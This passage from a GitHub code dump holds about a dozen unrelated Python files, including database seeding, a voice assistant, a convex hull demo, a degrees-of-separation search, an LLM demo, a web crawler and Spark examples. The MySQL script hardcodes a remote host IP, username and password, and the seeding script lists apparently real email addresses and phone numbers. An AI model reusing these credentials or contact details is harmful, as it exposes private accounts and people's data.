\"dh@yahoo.com\"\r\nuser2.phone = \"+98030152570\"\r\nuser2.testRes = False\r\nuser2.address = \"tehran - ... - 1\"\r\nuser2.gender = \"male\"\r\nuser2.natId = \"2910....97\"\r\nuser2.save()\r\n\r\nuser3 = User()\r\nuser3.firstName = \"reyhane\"\r\nuser3.lastName = \"barfeh\"\r\nuser3.email = \"fateme_akbari@yahoo.com\"\r\nuser3.phone = \"+98030152572\"\r\nuser3.testRes = False\r\nuser3.address = \"tehran - ... - 1\"\r\nuser3.gender = \"female\"\r\nuser3.natId = \"2910....98\"\r\nuser3.save()\r\n\r\n# ###################################################\r\n# #################### admin data ###################\r\n# ###################################################\r\n#\r\nadmin = Admin()\r\nadmin.firstName = \"admin1\"\r\nadmin.lastName = \"admin1\"\r\nadmin.email = \"mohsen_d98@yahoo.com\"\r\nadmin.phone = \"+9803015****\"\r\nadmin.address = \"tehran - ... - 1\"\r\nadmin.gender = \"male\"\r\nadmin.natId = \"2910....96\"\r\nadmin.save()\r\n\r\nadmin2 = Admin()\r\nadmin2.firstName = \"admin2\"\r\nadmin2.lastName = \"admin2\"\r\nadmin2.email = \"alireza@yahoo.com\"\r\nadmin2.phone = \"+9803015****\"\r\nadmin2.address = \"tehran - ... - 1\"\r\nadmin2.gender = \"male\"\r\nadmin2.natId = \"2910....97\"\r\nadmin2.save()\r\n\r\nadmin3 = Admin()\r\nadmin3.firstName = \"admin3\"\r\nadmin3.lastName = \"admin3\"\r\nadmin3.email = \"fateme_akbari@yahoo.com\"\r\nadmin3.phone = \"+9803015****\"\r\nadmin3.address = \"tehran - ... - 1\"\r\nadmin3.gender = \"female\"\r\nadmin3.natId = \"2910....98\"\r\nadmin3.save()\r\n","repo_name":"mohsenD98/iust-covid-database","sub_path":"python/DB/pushData.py","file_name":"pushData.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74433288543","text":"import speech_recognition as sr\nfrom gtts import gTTS\nimport playsound\nimport time\nfrom time import ctime\nimport os\n\ndef listen():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"I am listening..\")\n audio = r.listen(source, phrase_time_limit = 5)\n data = \"\"\n try:\n data = r.recognize_google(audio, language='en-US')\n print(\"You said:\" +data)\n except sr.UnknownValueError:\n print(\"I cant hear you\")\n except sr.RequestError as e:\n print(\"Request failed\")\n return data\n\ndef respond(string):\n print(string)\n tts = gTTS(text=string, lang = \"en\")\n tts.save(\"speech.mp3\")\n playsound.playsound(\"speech.mp3\")\n os.remove(\"speech.mp3\")\n\ndef voice_assistant(data):\n if \"how are you\" in data:\n listening = True\n respond(\"I am well\")\n\n if \"time\" in data:\n listening = True\n respond(ctime())\n\n if \"stop\" in data:\n listening = False\n print(\"listening stopped\")\n respond(\"see you jagadeesh\")\n\ntime.sleep(2)\nrespond(\"hello jagadeesh, what can i do for you\")\nlistening = True\nwhile listening == True:\n data = listen()\n listening = voice_assistant(data)\n \n \n","repo_name":"Jagadeeshroy/virtual-assistant","sub_path":"virtual_assistant.py","file_name":"virtual_assistant.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11392679007","text":"# import required modules\r\nimport mysql.connector\r\n \r\n# create connection object\r\ncon = mysql.connector.connect(\r\n host=\"147.226.187.252\", user=\"justin\",\r\n password=\"xia\", database=\"phplogin\")\r\n \r\n# create cursor object\r\ncursor = con.cursor()\r\n\r\n# assign data query\r\nquery = \"select * from cards\"\r\n \r\n# executing cursor\r\ncursor.execute(query)\r\n \r\n# display all records\r\nforms = cursor.fetchall()\r\n \r\nline=[] \r\nrows=[]\r\n\r\n# fetch all columns\r\nfor row in forms:\r\n for x in row:\r\n line.append(x)\r\n if(line[0]==\"Other\"):\r\n line.pop(0)\r\n else:\r\n line.pop(1) \r\n rows.append(line)\r\n print(line[4])\r\n line=[]\r\n \r\nprint(rows)\r\n\r\n\r\n#sql = \"UPDATE customers SET address = %s WHERE address = %s\"\r\n#val = (\"Valley 345\", \"Canyon 123\")\r\n\r\n#cursor.execute(sql, val)\r\n\r\n#con.commit()\r\n\r\n#print(cursor.rowcount, \"record(s) affected\")\r\n \r\n# closing cursor connection\r\ncursor.close()\r\n \r\n# closing connection object\r\ncon.close()","repo_name":"justinqxia/cardsystem","sub_path":"fetchdata.py","file_name":"fetchdata.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"43045422117","text":"import math\nimport random\nimport itertools\nimport operator\nimport collections\nimport alvi.client.containers\nimport alvi.client.utils\nfrom alvi.client.containers.cartesian import Line\nimport alvi.client.api.cartesian as cartesian\nfrom . import base\nimport logging\n\nlog = logging.getLogger(__package__)\nCoordinates = collections.namedtuple('Coordinates', 'x y')\nVector = Coordinates\nPointWithDetails = collections.namedtuple('PointWithDetails', 'point angle distance')\n\n\ndef angle(p0, p1):\n p0_to_p1 = Vector(p1.x - p0.x, p1.y - p0.y)\n len_b = math.sqrt(p0_to_p1.x**2 + p0_to_p1.y**2)\n #derived from dot product definition - the second vector is (1, 0)\n cos_ = p0_to_p1.x / len_b\n return -cos_\n\n\ndef distance(p0, p1):\n section = Vector(p1.x - p0.x, p1.y - p0.y)\n return math.sqrt(section.x**2 + section.y**2)\n\n\ndef cross_product(p0, p1, p2):\n return ((p1.x-p0.x)*(p2.y-p0.y)) - ((p2.x-p0.x)*(p1.y - p0.y))\n\n\nclass LineStack():\n\n def __init__(self, container):\n self.container = container\n self.points = []\n self._popped_since_last_sync = 0\n self._lines = []\n\n def pop(self):\n self.points.pop()\n self._popped_since_last_sync += 1\n\n def push(self, point):\n self.points.append(point)\n if len(self.points) > 1:\n self._sync_after_push()\n\n def _sync_after_push(self):\n if self._popped_since_last_sync == 0:\n self._lines.append(Line(self.container, self.points[-2], self.points[-1]))\n elif self._popped_since_last_sync == 1:\n self._lines[-1].point_to = self.points[-1]\n self._popped_since_last_sync = 0\n else:\n for i in range(self._popped_since_last_sync-1):\n cartesian.remove_line(self.container._pipe, self._lines.pop().id)\n self.container.sync()\n self._lines[-1].point_to = self.points[-1]\n self._popped_since_last_sync = 0\n self.container.sync()\n\n\nclass GrahamConvexHull(base.Scene):\n def run(self, **kwargs):\n container = kwargs['container']\n data_generator = kwargs['data_generator']\n self.generate_nodes(container, data_generator)\n self.find_convex_hull(container)\n\n def generate_nodes(self, container, data_generator):\n #create a set of unique 2d points\n all_points = [Coordinates(*xy) for xy in itertools.product(range(1, 46), range(1, 16))]\n random.shuffle(all_points)\n for point in all_points[:45]:\n container.create_point(point)\n container.sync()\n\n def find_convex_hull(self, container):\n lowest_leftmost_point, rest_points = self.find_lowest_leftmost(container.points)\n rest_points = self.sort_by_angle_from_lowest(lowest_leftmost_point, rest_points)\n rest_points = self.remove_points_with_same_angle(rest_points)\n\n line_stack = LineStack(container)\n line_stack.push(lowest_leftmost_point)\n line_stack.push(rest_points[0].point)\n line_stack.push(rest_points[1].point)\n\n for point in rest_points[2:]:\n while cross_product(line_stack.points[-2], line_stack.points[-1], point.point) < 0:\n line_stack.pop()\n line_stack.push(point.point)\n line_stack.push(lowest_leftmost_point)\n\n def find_lowest_leftmost(self, points):\n sorted_points = sorted(points, key=operator.attrgetter('y', 'x'))\n lowest_leftmost_point = sorted_points[0]\n return lowest_leftmost_point, sorted_points[1:]\n\n def sort_by_angle_from_lowest(self, origin_point, points):\n p0 = origin_point\n points_with_angles_and_distances = [\n PointWithDetails(p, angle(p0, p), distance(p0, p)) for p in points\n ]\n all_other_points = sorted(\n points_with_angles_and_distances,\n key=operator.attrgetter('angle', 'distance'))\n return all_other_points\n\n def remove_points_with_same_angle(self, rest_points):\n \"\"\"\n Point sorted by angle and distance from origin\n - if angle is the same, leaves only the furthest one\n \"\"\"\n all_other_points_unique = []\n last_point = rest_points[-1]\n all_other_points_unique.append(last_point)\n for current_point in reversed(rest_points[:-1]):\n old_angle = last_point.angle\n new_angle = current_point.angle\n if old_angle != new_angle:\n all_other_points_unique.append(current_point)\n last_point = current_point\n all_other_points_unique = list(reversed(all_other_points_unique))\n return all_other_points_unique\n\n @staticmethod\n def container_class():\n return alvi.client.containers.Cartesian\n\n\nif __name__ == \"__main__\":\n GrahamConvexHull.start()","repo_name":"alviproject/alvi","sub_path":"alvi/client/scenes/graham_convex_hull.py","file_name":"graham_convex_hull.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"73559737822","text":"import csv\nimport sys\n\nfrom util import Node, StackFrontier, QueueFrontier\n\n# Maps names to a set of corresponding person_ids\nnames = {}\n\n# Maps person_ids to a dictionary of: name, birth, movies (a set of movie_ids)\npeople = {}\n\n# Maps movie_ids to a dictionary of: title, year, stars (a set of person_ids)\nmovies = {}\n\n\ndef load_data(directory):\n \"\"\"\n Load data from CSV files into memory.\n \"\"\"\n # Load people\n with open(f\"{directory}/people.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n people[row[\"id\"]] = {\n \"name\": row[\"name\"],\n \"birth\": row[\"birth\"],\n \"movies\": set()\n }\n if row[\"name\"].lower() not in names:\n names[row[\"name\"].lower()] = {row[\"id\"]}\n else:\n names[row[\"name\"].lower()].add(row[\"id\"])\n\n # Load movies\n with open(f\"{directory}/movies.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n movies[row[\"id\"]] = {\n \"title\": row[\"title\"],\n \"year\": row[\"year\"],\n \"stars\": set()\n }\n\n # Load stars\n with open(f\"{directory}/stars.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n try:\n people[row[\"person_id\"]][\"movies\"].add(row[\"movie_id\"])\n movies[row[\"movie_id\"]][\"stars\"].add(row[\"person_id\"])\n except KeyError:\n pass\n\n\ndef main():\n if len(sys.argv) > 2:\n sys.exit(\"Usage: python degrees.py [directory]\")\n directory = sys.argv[1] if len(sys.argv) == 2 else \"large\"\n\n # Load data from files into memory\n print(\"Loading data...\")\n load_data(directory)\n print(\"Data loaded.\")\n\n source = person_id_for_name(input(\"Name: \"))\n if source is None:\n sys.exit(\"Person not found.\")\n target = person_id_for_name(input(\"Name: \"))\n if target is None:\n sys.exit(\"Person not found.\")\n\n path = shortest_path(source, target)\n\n if path is None:\n print(\"Not connected.\")\n else:\n degrees = len(path)\n print(f\"{degrees} degrees of separation.\")\n path = [(None, source)] + path\n for i in range(degrees):\n person1 = people[path[i][1]][\"name\"]\n person2 = people[path[i + 1][1]][\"name\"]\n movie = movies[path[i + 1][0]][\"title\"]\n print(f\"{i + 1}: {person1} and {person2} starred in {movie}\")\n\n\ndef shortest_path(source, target):\n \"\"\"\n Returns the shortest list of (movie_id, person_id) pairs\n that connect the source to the target.\n\n If no possible path, returns None.\n \"\"\"\n\n start = Node(state=source, parent=None, action=None)\n # We use a queue frontier for Breadth First Search\n frontier = QueueFrontier()\n frontier.add(start)\n # Keeping track of which nodes we explored so we dont back track to them\n explored = set()\n\n\n while True:\n # If there is no path/solution, return None\n if frontier.empty():\n return None\n\n # Remove a node for testing\n node = frontier.remove()\n\n # The node we are currently on is now being explored\n explored.add(node.state)\n\n # Find all the neighbors of the source\n for action, state in neighbors_for_person(node.state):\n # If our current item in the frontier does not contain the current actor and it hasnt been explored already\n if not frontier.contains_state(state) and state not in explored:\n \n child = Node(state=state, parent=node, action=action)\n # For efficiency, before adding the node to the frontier I check if it is our goal as indicated by the given hint \n if child.state == target:\n solution = []\n while child.parent is not None:\n solution.insert(0,(child.action, child.state))\n child = child.parent\n return solution\n else:\n frontier.add(child)\n\n\n\ndef person_id_for_name(name):\n \"\"\"\n Returns the IMDB id for a person's name,\n resolving ambiguities as needed.\n \"\"\"\n person_ids = list(names.get(name.lower(), set()))\n if len(person_ids) == 0:\n return None\n elif len(person_ids) > 1:\n print(f\"Which '{name}'?\")\n for person_id in person_ids:\n person = people[person_id]\n name = person[\"name\"]\n birth = person[\"birth\"]\n print(f\"ID: {person_id}, Name: {name}, Birth: {birth}\")\n try:\n person_id = input(\"Intended Person ID: \")\n if person_id in person_ids:\n return person_id\n except ValueError:\n pass\n return None\n else:\n return person_ids[0]\n\n\ndef neighbors_for_person(person_id):\n \"\"\"\n Returns (movie_id, person_id) pairs for people\n who starred with a given person.\n \"\"\"\n movie_ids = people[person_id][\"movies\"]\n neighbors = set()\n for movie_id in movie_ids:\n for person_id in movies[movie_id][\"stars\"]:\n neighbors.add((movie_id, person_id))\n return neighbors\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"amanudde1999/CS50-AI","sub_path":"degrees/degrees.py","file_name":"degrees.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"18158981269","text":"import requests\nimport streamlit as st\nfrom streamlit_lottie import st_lottie\n\nimport torch\nfrom transformers import pipeline\n\nfrom langchain import PromptTemplate, LLMChain\nfrom langchain.llms import HuggingFacePipeline\n\n# Helper functions\ndef load_lottieurl(url):\n r = requests.get(url)\n if r.status_code != 200:\n return None\n return r.json()\n\ndef local_css(file_name):\n with open(file_name) as f:\n st.markdown(f\"\", unsafe_allow_html=True)\n\ndef change_session_state():\n st.session_state[\"run started\"] = True\n\n# ASSETS\nlottie_robot = load_lottieurl(\"https://assets3.lottiefiles.com/packages/lf20_eZGSBU1hRJ.json\")\n\n# PAGE INFO\nst.set_page_config(page_title=\"EHR Capture\", page_icon=\":mechanical_arm:\") #, layout=\"wide\")\n\n# CSS\nlocal_css(\"style/style.css\")\n\n# Load Models\ndolly = 'C:/Users/c062387/OneDrive - Thrivent Financial/Documents/Documents/UW Analytics Team/GitRepos/question-answer-app/dolly/'\nxdoc = 'C:/Users/c062387/OneDrive - Thrivent Financial/Documents/Documents/UW Analytics Team/GitRepos/question-answer-app/xdoc/squad2/'\n\n@st.cache_data\ndef get_models(dolly, xdoc):\n generate_text = pipeline(model=dolly, torch_dtype=torch.bfloat16,\n trust_remote_code=True, device_map=\"auto\", return_full_text=True)\n\n # qa_model = pipeline('question-answering', model=xdoc, tokenizer=xdoc)\n\n return generate_text #, qa_model\n\n# generate_text, qa_model = get_models(dolly, xdoc)\ngenerate_text = get_models(dolly, xdoc)\n\n# Dolly Template\nprompt_with_context = PromptTemplate(\n input_variables=[\"instruction\", \"context\"],\n template=\"{instruction}\\n\\nInput:\\n{context}\")\n\nhf_pipeline = HuggingFacePipeline(pipeline=generate_text)\n\nllm_context_chain = LLMChain(llm=hf_pipeline, prompt=prompt_with_context)\n\n# Ask questions\ndef ask_xdoc(question, context):\n return qa_model({'question': question,'context': context}).get('answer')\n\ndef ask_dolly(question, context):\n return llm_context_chain.predict(instruction=question, context=context).lstrip()\n\n\n# HEADER SECTION\nwith st.container():\n st_lottie(lottie_robot, height=200, key=\"robot\")\n row1_col1, row1_col2, row1_col3 = st.columns((1, 3, 1))\n with row1_col1:\n pass\n with row1_col2:\n st.markdown(\"

LLM Experimentation

\", unsafe_allow_html=True)\n with row1_col3:\n pass\n\n st.write(\"##\")\n\n with st.form('my_form'):\n\n context = st.text_area('Enter the context', 'George Washington (February 22, 1732[b] - December 14, 1799) was an American military officer, statesman, and Founding Father who served as the first president of the United States from 1789 to 1797.')\n\n question = st.text_area('Enter your question', value='When was George Washington president?')\n\n submitted = st.form_submit_button('Ask')\n\n if submitted:\n col1, col2 = st.columns((1, 1))\n\n with col1:\n st.markdown('**XDoc Response**')\n # st.info(ask_xdoc(question, context))\n\n with col2:\n st.markdown('**Dolly Response**')\n st.info(ask_dolly(question, context))\n \n else: \n col1, col2 = st.columns((1, 1))\n\n with col1:\n st.markdown('**XDoc Response**')\n\n with col2:\n st.markdown('**Dolly Response**')\n\n\n\n# question = \"When was George Washington president?\"\n# context = \"\"\"George Washington (February 22, 1732[b] - December 14, 1799) was an American military officer, statesman,\n# and Founding Father who served as the first president of the United States from 1789 to 1797.\"\"\"\n\n\n\n\n# print(llm_context_chain.predict(instruction=question, context=context).lstrip())\n\n# qa_model({'question': question,'context': context}).get('answer')\n\n","repo_name":"RyanKnitter/question-answer-app","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19915032157","text":"import requests\nimport re\n\n\nclass SpiderBot:\n\n def __init__(self):\n self.found_urls = [] # we save url to omit repetitions\n self.iter = 1 # we track the number of found urls\n\n def crawl(self, first_url):\n\n queue = [first_url]\n self.found_urls.append(first_url)\n\n # breadth-first-search algorithm\n while queue:\n\n current_url = queue.pop(0)\n print(f\"{self.iter}: {current_url}\")\n self.iter += 1\n\n for url in self.get_urls_from_url(current_url):\n if url not in self.found_urls:\n self.found_urls.append(url)\n queue.append(url)\n\n def get_urls_from_url(self, url):\n try:\n html = requests.get(url, timeout=10).text\n except:\n return []\n\n return re.findall(r\"https?://[\\w.-]+\\.[a-z]{2,3}\", html)\n \"\"\" \n The regex finds urls in the html. However, its form is pretty comprehensive and\n not ideal but it works good enough.\n \"\"\"\n\nif __name__ == '__main__':\n\n crawler = SpiderBot()\n crawler.crawl('https://stackoverflow.com')\n\n","repo_name":"KornelWitkowski/AI-Algorithms","sub_path":"Algorithms/SpiderBot/SpiderBot.py","file_name":"SpiderBot.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7192903117","text":"from utils import *\nimport threading, os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# Class for an AI based on monte-carlo simulation\nclass AI:\n def __init__(self, env, samples):\n self.env = env\n self.move_sim = samples # The number of moves to simulate\n self.priority = 5 # The priority to give simulations that intersect hits\n\n # Evaluate the model by running it many times and averaging the scores\n def eval_model(self, evals):\n scores = []\n for i in range(evals):\n scores.append(self.run(i))\n print(f\"Game {i}/{evals} \\n Score: {scores[-1]}\")\n print(np.mean(scores))\n\n # Take in the board state and return probabilities of a ship being somewhere\n def monte_carlo(self, state, out_path):\n simulations = []\n\n #\n for i in range(self.move_sim):\n self.env.simulate_board.update(state)\n brd, intersect = self.env.simulate_board.simulate_ship()\n\n # If we intersect a hit, take into account priority and overlap\n if intersect:\n for i in range(self.priority):\n for i in range(intersect):\n simulations.append(brd)\n simulations.append(brd)\n\n # Mean the ship simulations down the stacked axis to calculate percentages\n simulations = np.array(simulations)\n percentages = np.mean(simulations, axis=0)\n\n # Output a heatmap if specified\n if out_path != '':\n fig = plt.figure(figsize=(8, 8))\n fig.add_subplot(1, 2, 1)\n plt.imshow(percentages, cmap='hot', interpolation='nearest')\n fig.add_subplot(1, 2, 2)\n plt.imshow(state.get_board() * 5, cmap='bwr', interpolation=None)\n plt.savefig(out_path)\n plt.close(fig)\n\n return percentages\n\n # Get the AI to run a game of battleships on it's own for testing\n def run(self, r_count):\n s = self.env.reset()\n done = False\n count = 0\n while not done:\n count += 1\n if not os.path.exists(f'save_file_{r_count}/'):\n os.mkdir(f'save_file_{r_count}/')\n s, done = self.env.step(self.monte_carlo(s, f'save_file_{r_count}/{count}.png'))\n # s.print_board()\n print(f\"SCORE: {np.count_nonzero(s.get_board() == 0)}\")\n return np.count_nonzero(s.get_board() == 0)\n\n # Use the monte carlo simulation algorithm to predict a move against a player and make that move\n def move(self):\n return self.env.step(self.monte_carlo(self.env.attack_board, ''))\n\n\n\n","repo_name":"mitchelljy/battleships_ai","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"} +{"seq_id":"3327311246","text":"import logging\nimport time\nimport aioredis\nimport asyncio\nimport uvloop\nimport redis\nfrom functools import wraps\nfrom sanic.response import json\nfrom config import TOKEN\nfrom config import REDIS_HOST, REDIS_PORT, REDIS_DB\nfrom logging.handlers import RotatingFileHandler\n\n\ndef log(level, message):\n\n logger = logging.getLogger('socket')\n\n # 这里进行判断,如果logger.handlers列表为空,则添加,否则,直接去写日志\n if not logger.handlers:\n log_name = 'socket.log'\n log_count = 2\n log_format = '%(asctime)s %(levelname)s %(module)s %(funcName)s-[%(lineno)d] %(message)s'\n log_level = logging.INFO\n max_bytes = 10 * 1024 * 1024\n handler = RotatingFileHandler(log_name, mode='a', maxBytes=max_bytes, backupCount=log_count)\n handler.setFormatter(logging.Formatter(log_format))\n logger.setLevel(log_level)\n logger.addHandler(handler)\n\n if level == 'info':\n logger.info(message)\n if level == 'error':\n logger.error(message)\n\n\ndef auth(token):\n def wrapper(func):\n @wraps(func)\n async def auth_token(req, *arg, **kwargs):\n try:\n value = req.headers.get(token)\n if value and TOKEN == value:\n r = await func(req, *arg, **kwargs)\n return json({'retcode': 0, 'stdout': r})\n else:\n return json({'retcode': 1, 'stderr': 'status{}'.format(403)})\n except Exception as e:\n log('error', str(e))\n return json({'retcode': 1, 'stderr': str(e)})\n return auth_token\n return wrapper\n\n\ndef timethis(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n start = time.perf_counter()\n r = func(*args, **kwargs)\n end = time.perf_counter()\n print('{}.{} : {}'.format(func.__module__, func.__name__, end - start))\n return r\n return wrapper\n\n\nasync def producer_redis(loop, message):\n\n start_time = time.time()\n redis = await aioredis.create_redis_pool(\n 'redis://127.0.0.1:6379', db=0, loop=loop)\n await redis.rpush('log-message', message)\n redis.close()\n await redis.wait_closed()\n print(time.time() - start_time)\n\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\nloop = uvloop.new_event_loop()\n\n\ndef rpush_redis(msg_list):\n try:\n start_time = time.time()\n pool = redis.ConnectionPool(host=REDIS_HOST, port=REDIS_PORT, db=REDIS_DB, max_connections=10)\n r = redis.StrictRedis(connection_pool=pool)\n [r.rpush(\"log-msg\", i) for i in msg_list]\n print(time.time() - start_time)\n # async def test():\n # print(1)\n # redis = await aioredis.create_redis_pool(\n # 'redis://127.0.0.1:6379', db=0, loop=loop)\n # await redis.rpush('log-msg', msg)\n # redis.close()\n # await redis.wait_closed()\n # loop.run_until_complete(test())\n except Exception as e:\n log('error', str(e))\n\n\n","repo_name":"hugoren/socket_uvloop","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16902328993","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n# Vehicle parameter\nW = 1.8 #[m] width of vehicle\nLF = 3.7 #[m] distance from rear to vehicle front end of vehicle\nLB = 1.0 #[m] distance from rear to vehicle back end of vehicle\nTR = 0.5 # Tyre radius [m] for plot\nTW = 1.0 # Tyre width [m] for plot\nMAX_STEER = 0.6 #[rad] maximum steering angle\nWB = 2.7 #[m] wheel base: rear to front steer\n\ndef plot_trailer(x, y, yaw, steer, retrun_trailer = False):\n truckcolor = \"-k\"\n\n LENGTH = LB+LF\n\n truckOutLine = np.array([[-LB, (LENGTH - LB), (LENGTH - LB), (-LB), (-LB)],\n [W / 2, W / 2, - W / 2, - W / 2, W / 2]])\n\n\n rr_wheel = np.array([[TR, - TR, - TR, TR, TR],\n [-W / 12.0 + TW, - W / 12.0 + TW, W / 12.0 + TW, W / 12.0 + TW, - W / 12.0 + TW]])\n\n rl_wheel = np.array([[TR, - TR, - TR, TR, TR],\n [-W / 12.0 - TW, - W / 12.0 - TW, W / 12.0 - TW, W / 12.0 - TW, - W / 12.0 - TW]])\n\n fr_wheel = np.array([[TR, - TR, - TR, TR, TR],\n [- W / 12.0 + TW, - W / 12.0 + TW, W / 12.0 + TW, W / 12.0 + TW, - W / 12.0 + TW]])\n\n fl_wheel = np.array([[TR, - TR, - TR, TR, TR],\n [-W / 12.0 - TW, - W / 12.0 - TW, W / 12.0 - TW, W / 12.0 - TW, - W / 12.0 - TW]])\n\n Rot1 = np.array([[math.cos(yaw), math.sin(yaw)],\n [-math.sin(yaw), math.cos(yaw)]])\n Rot2 = np.array([[math.cos(steer), math.sin(steer)],\n [-math.sin(steer), math.cos(steer)]])\n\n\n fr_wheel = np.dot(fr_wheel.T, Rot2).T\n fl_wheel = np.dot(fl_wheel.T, Rot2).T\n fr_wheel[0,:] += WB\n fl_wheel[0,:] += WB\n fr_wheel = np.dot(fr_wheel.T, Rot1).T\n fl_wheel = np.dot(fl_wheel.T, Rot1).T\n\n truckOutLine = np.dot(truckOutLine.T, Rot1)\n\n rr_wheel = np.dot(rr_wheel.T, Rot1).T\n rl_wheel = np.dot(rl_wheel.T, Rot1).T\n\n truckOutLine = truckOutLine.T\n truckOutLine[0,:] += x\n truckOutLine[1,:] += y\n fr_wheel[0, :] += x\n fr_wheel[1, :] += y\n rr_wheel[0, :] += x\n rr_wheel[1, :] += y\n fl_wheel[0, :] += x\n fl_wheel[1, :] += y\n rl_wheel[0, :] += x\n rl_wheel[1, :] += y\n\n if retrun_trailer == False:\n plt.plot(x, y, \"*\")\n plt.plot(fr_wheel[0, :], fr_wheel[1, :], truckcolor)\n plt.plot(rr_wheel[0, :], rr_wheel[1, :], truckcolor)\n plt.plot(fl_wheel[0, :], fl_wheel[1, :], truckcolor)\n plt.plot(rl_wheel[0, :], rl_wheel[1, :], truckcolor)\n plt.plot(truckOutLine[0, :], truckOutLine[1, :], truckcolor)\n else:\n return truckOutLine[0, :], truckOutLine[1, :]","repo_name":"ChenBohan/Robotics-Cooperative-Path-Planning-03-Hybrid-A-Star-Trajectory-Planning","sub_path":"lib/vehicle.py","file_name":"vehicle.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"7"} +{"seq_id":"27558113019","text":"from pathlib import Path\nimport io\nfrom k1data import K1patch, K1library\n\ndef pr_peek(filebuffer, bytestoread):\n return (filebuffer.peek(bytestoread)[:bytestoread])\n\ndef read_bankfiles(infiles, k1library):\n for infile in infiles:\n bankfile = open(infile, \"rb\")\n while bankfile.peek(1) :\n if (pr_peek(bankfile, 1)) == b'\\xF0':\n bankfile.seek(7, io.SEEK_CUR)\n if pr_peek(bankfile, 1) == b'\\x00' or \\\n pr_peek(bankfile, 1) == b'\\x20':\n #single\n bankfile.seek(1, io.SEEK_CUR)\n while pr_peek(bankfile, 1) != b'\\xF7':\n datachunk = bankfile.read(88)\n if len(datachunk) < 88:\n break\n patch = K1patch(datachunk, Path(infile).stem)\n k1library.add_single(patch)\n elif pr_peek(bankfile, 1) == b'\\x40':\n #multi\n while pr_peek(bankfile, 1) != b'\\xF7':\n datachunk = bankfile.read(76)\n if len(datachunk) < 76:\n break\n patch = K1patch(datachunk, Path(infile).stem)\n k1library.add_multi(patch)\n else:\n print(\"error\")\n #pass#unexpected sysex format\n else:\n bankfile.seek(1, io.SEEK_CUR)\n #end while\n k1library.add_bankname(Path(infile).stem)\n bankfile.close()\n","repo_name":"markussundstrom/k1manager","sub_path":"k1filereader.py","file_name":"k1filereader.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34335680936","text":"#####################################################\n# RDD persistence example\n#####################################################\n\nimport pyspark\nimport time\n\nsc = pyspark.SparkContext(appName='persist')\n\n\n#############################################################################\n# read in citation data, count total number of citations, and total\n# number of citations on Christmas, summarize states that are\n# cited on Christmas\n#############################################################################\n\nfile = '2016-12.csv'\n\n# Specifies RDD lineage: \n# (1) read data from file\nrdd = sc.textFile(file)\n\n# Action requires execution of entire lineage\n# (1) read data from file\n# Then count the number of records (which is the number of lines in the file)\nrdd.count()\n\n# is rdd cached?\nrdd.is_cached\n\n# Addition to RDD lineage:\n# (2) filter data to include only citations from 12/25/2016\nrdd = rdd.filter(lambda x: x.split(',')[1] == '2016-12-25')\n\n# Action requires execution of entire lineage\n# (1) read data from file\n# (2) filter data to include only citations from 12/25/2016\n# Then count the number of records (number of citations on 12/25/2016)\nrdd.count()\n\n\n# Addition to RDD lineage:\n# (3) create pair RDDs where key = state and value = original record \nrdd = rdd.keyBy(lambda x: x.split(',')[2])\n\n\n# Action requires execution of entire lineage\n# (1) read data from file\n# (2) filter data to include only citations from 12/25/2016\n# (3) create pair RDDs where key = state and value = original record \n# Then return dictionary counting number of results by key\nrdd.countByKey()\n\n###########################################################################\n# persist will store rdd in memory (by default)\n###########################################################################\n\n# This rdd will persist (in memory) the next time it is computed\nrdd.persist()\nrdd.is_cached\n\n# Action requires execution of entire lineage, but RDD is stored in memory\n# (1) read data from file\n# (2) filter data to include only citations from 12/25/2016\n# (3) create pair RDDs where key = state and value = original record \n# The RDD in (3) is set to persist, so this RDD is stored in memory\n# Then return dictionary counting number of results by key\nrdd.count()\n\n# Action requires execution of lineage, starting with last persistent RDD,\n# which is the RDD in lineage step (3)\n# (1) (NOT EXECUTED) read data from file\n# (2) (NOT EXECUTED) filter data to include only citations from 12/25/2016\n# (3) (NOT EXECUTED) create pair RDDs where key = state and value = original record \n# Uses 'rdd' from memory to return a dictionary counting results by key\nrdd.countByKey()\n\n\n\n###########################################################\n# Function that times how long it takes to \n###########################################################\n\ndef time_rdd(file, persist = False) : \n start = time.time()\n \n rdd = sc.textFile(file)\n\n # count total number of citations\n rdd.count()\n\n # filter citations to include only those given on Christmas\n rdd = rdd.filter(lambda x: x.split(',')[1] == '2016-12-25')\n \n # if specified, persist this rdd\n if persist :\n rdd.persist()\n\n # count the total number of citations (on Christmas)\n rdd.count()\n\n # 